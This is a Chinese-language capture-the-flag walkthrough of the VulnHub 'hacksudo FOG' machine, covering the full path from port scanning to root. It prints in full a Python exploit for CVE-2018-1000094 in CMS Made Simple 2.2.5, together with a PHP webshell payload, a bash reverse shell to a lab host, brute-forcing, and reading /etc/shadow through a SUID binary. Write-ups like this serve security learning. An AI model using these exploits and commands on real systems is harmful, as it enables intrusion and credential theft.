hacksudo FOG
hacksudo FOG渗透测试
1 环境准备
官网下载
Virtual Box 启动
2 测试过程
2.1 nmap 扫描端口
nmap -sC -sV -A -p- 192.168.56.101 -o port.txt
root@kali:~/baji/vulnhub/hacksudoFOG# nmap -sC -sV -A -p- 192.168.56.101 -o port.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-11 14:03 CST
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 52064/udp6 mountd
| 100005 1,2,3 55221/tcp6 mountd
| 100005 1,2,3 55600/udp mountd
| 100005 1,2,3 58771/tcp mountd
| 100021 1,3,4 33301/tcp6 nlockmgr
| 100021 1,3,4 40954/udp6 nlockmgr
| 100021 1,3,4 45747/tcp nlockmgr
| 100021 1,3,4 50437/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 92
| Capabilities flags: 63486
| Some Capabilities: ODBCClient, Support41Auth, LongColumnFlag, SupportsLoadDataLocal, SupportsCompression, IgnoreSpaceBeforeParenthesis, InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, FoundRows, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: MP,'|aQP|Br:fu<fnu"F
|_ Auth Plugin Name: mysql_native_password
42889/tcp open mountd 1-3 (RPC #100005)
45747/tcp open nlockmgr 1-4 (RPC #100021)
47831/tcp open mountd 1-3 (RPC #100005)
58771/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:CD:E5:65 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.59 seconds
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
443/tcp open ssl/https Apache/2.4.38 (Debian)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
42889/tcp open mountd 1-3 (RPC #100005)
45747/tcp open nlockmgr 1-4 (RPC #100021)
47831/tcp open mountd 1-3 (RPC #100005)
58771/tcp open mountd 1-3 (RPC #100005)
2.2 测试思路
80,443 web端口找洞
21 匿名登录 爆破密码
22 爆破
3306 爆破
2.3 浏览80
首页只有一个链接
点击链接
只有一个图片源码里 ” 凯撒密码 “ 还有个github地址
2.4 gobuster目录枚举
gobuster dir --url 192.168.56.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html
/index.php (Status: 302) [Size: 0] [–> /fog/index.php]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [–> http://192.168.56.101/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [–> http://192.168.56.101/fog/]
/server-status (Status: 403) [Size: 279]
/dict.txt (Status: 200) [Size: 1798]
2.5 查看cms目录
确定cms为Made simple
发现一个账号为hacksudo
像是账号的字符串 都可以记到user.txt 后边爆破可用
源码搜索version 发现版本为 2.2.5
搜索漏洞
2.6 searchsploit 搜索cms历史漏洞
searchsploit made simple
searchsploit -m 44976
查看 py脚本
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.1.10/cmsms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "admin"
password = "password"
csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"
def parse_csrf_token(location):
return location.split(csrf_param + "=")[1]
def authenticate():
page = "/login.php"
url = base_url + page
data = {
"username": username,
"password": password,
"loginsubmit": "Submit"
}
response = requests.post(url, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully with the supplied credentials"
return response.cookies, parse_csrf_token(response.headers['Location'])
print "[-] Authentication failed"
return None, None
def upload_txt(cookies, csrf_token):
mact = "FileManager,m1_,upload,0"
page = "/moduleinterface.php"
url = base_url + page
data = {
"mact": mact,
csrf_param: csrf_token,
"disable_buffer": 1
}
txt = {
'm1_files[]': (txt_filename, payload)
}
print "[*] Attempting to upload {}...".format(txt_filename)
response = requests.post(url, data=data, files=txt, cookies=cookies)
status_code = response.status_code
if status_code == 200:
print "[+] Successfully uploaded {}".format(txt_filename)
return True
print "[-] An error occurred while uploading {}".format(txt_filename)
return None
def copy_to_php(cookies, csrf_token):
mact = "FileManager,m1_,fileaction,0"
page = "/moduleinterface.php"
url = base_url + page
b64 = base64.b64encode(txt_filename)
serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
data = {
"mact": mact,
csrf_param: csrf_token,
"m1_fileactioncopy": "",
"m1_path": upload_dir,
"m1_selall": serialized,
"m1_destdir": "/",
"m1_destname": php_filename,
"m1_submit": "Copy"
}
print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
if response.headers['Location'].endswith('copysuccess'):
print "[+] File copied successfully"
return True
print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
return None
def quit():
print "[-] Exploit failed"
exit()
def run():
cookies,csrf_token = authenticate()
if not cookies:
quit()
if not upload_txt(cookies, csrf_token):
quit()
if not copy_to_php(cookies, csrf_token):
quit()
print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
可以发现 需要在/admin 登录后台 需要账号密码
2.7 查看dict.txt
wget http://192.168.56.101/dict.txt
发现有196个可能为密码的文件
2.8 抓包登录爆破cms后台(失败)
刚好搜集到这么多密码 爆破ftp 和ssh试试
2.9 爆破ftp
hydra -L user.txt -P dict.txt 192.168.56.101 ftp
爆破出账号密码
login: hacksudo password: hackme
登录成功
2.10 获取到第一个flag
great you done step 1
___ ___ _ __ __ _ _ __ __ | | _ | | __ | |() ___ _ __
/ / _ | ’ \ / | '__/ _ | __| | | | |/ ` | _| |/ _ | ’ \
| (| () | | | | (| | | | (| | || || | | (| | || | (_) | | | |
__/|| ||_, || _,|_|_,||_,|_||_/|| ||
|__/
www.hacksudo.com
2.11 ftp下载另外三个文件
root@kali:~/baji/vulnhub/hacksudoFOG# cat authors.txt
hacksudo CEO & Founder = vishal waghmare vishal@hacksudo.com
2.12 zip2john 破解zip密码
先获得Hash文件,然后再上John工具
- 获得hash文件
zip2john secr3tSteg.zip | tee hash
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-al1nLcRw-1649663646620)(C:\Users\YouthBelief\AppData\Roaming\Typora\typora-user-images\image-20220411152829048.png)]
- 2
john破解中间Hash文件
john hash --wordlist=/usr/share/wordlists/rockyou.txt
密码是 fooled
2.13 从解压的音频文件提取密文
利用首页源码github提供的工具 解密
python3 ExWave.py -f hacksudoSTEGNO.wav
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
很明显是密文, 之前源码还有提示 凯撒密码 。
wwww.localhost/fog Username=fog:password=hacksudoISRO
2.14 登陆后台
http://192.168.56.101/cms/admin
Username=fog:password=hacksudoISRO
2.15CVE-2018-1000094-CMSMS 2.2.5代码执行漏洞
https://blog.csdn.net/weixin_39963819/article/details/114340119
参照文章上传webshell copy为php后缀
2.16 反弹shell
bash -c ‘exec bash -i &>/dev/tcp/192.168.56.137/8888 <&1’
2.17 切换为完整终端
- python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
- export TERM=xterm 然后 Ctrl+Z 退出来一下
- stty raw -echo;fg 回车后输入 reset 再回车
- stty rows 46 columns 188
3 后渗透
3.1 信息收集
linux 账号
数据库账号密码
3.2 第二个flag
www-data@hacksudo://var/www$ cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ | | _ | | __ | |() ___ _ __
/ / _ | ’ \ / | '__/ _ | __| | | | |/ ` | _| |/ _ | ’ \
| (| () | | | | (| | | | (| | || || | | (| | || | (_) | | | |
__/|| ||_, || _,|_|_,||_,|_||_/|| ||
step 2 done.
_ ____
| | ___ _ __ | \
/ | / _ \ ’ \ ) |
_ \ || / |) | / /
|/___| ./ |___|
|_|
3.3 ssh爆破
有4个账号都爆破试试
时间太久 算了 没办法再试吧
3.4 suid权限(look)
find / -user root -perm -4000 -print 2>/dev/null
使用look查看shadow 文件
look '' /etc/shadow
3.5 john破解ssh密码
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.txt
isro 密码为qwerty
3.6 ssh登录isro (成功)
3.7 查看sudo权限
可以以root权限执行ls命令
3.8 翻文件
有fog get ping python 可执行文件
发现fog 所属用户为root 而isro也可以执行
3.9 运行fog
进入python运行界面
root权限有了
import pty;pty.spawn("/bin/bash");
root flag拿下
4 总结
本次靶机通关思路:
- web目录枚举收集到 dict.txt 一组字典。从网页收集到用户名。
- hydra爆破ftp,ftp下载zip
- zip2john 解密zip密码。
- 根据首页源码提示,SoundStegno工具获取wav格式的密文获取账号密码。
- 登录到Made simple ,后台上传webshell,getshell。
- look suid权限 读取shadow文件。
- john 解密isro 账号密码。
- ssh登录isro,发现目录下存在具有root权限的可执行文件,执行后为python命令
- import pty; pty.spawn(“/bin/bash”); 获取到root权限
521
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
